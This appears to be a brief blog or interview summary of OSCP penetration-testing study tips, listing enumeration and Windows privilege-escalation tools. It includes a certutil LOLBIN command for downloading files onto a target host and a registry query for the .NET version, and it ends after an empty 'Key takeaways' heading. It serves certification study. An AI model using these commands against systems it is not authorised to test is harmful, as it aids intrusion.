Aaron Goldstein

Interview is here.
  • - Great site for tracking progress against machines (can import nmap data for tracking too). I use this all the time for the Venom builder (shell creation) and other cool stuff. The free version works great.
  • AutoRecon is the tool I used for automating the enumeration process (and OSCP exam approved) I also used a LOLBIN (Living off the Land Binary) to download files from the Windows box - the command was "Certutil -urlcache -split -f <link to file to download>"These are great because most systems will already have them installed.
  • Here is a great site that outlines TONS of them.
  • A few links / tools that helped me with Windows Privesc:List of pre-compiled binaries for different exploits -
  • WATSON -tool for identifying exploits for Windows privesc - requires .NET - runs on target host Quick method to check what version of .NET is installed on host (needed for Watson)- reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
  • Windows Exploit Suggester - This is a great tool for finding exploits on windows hosts for privesc too - but this one takes in the "systeminfo" from the target host and runs locally on the attacker system
Key takeaways :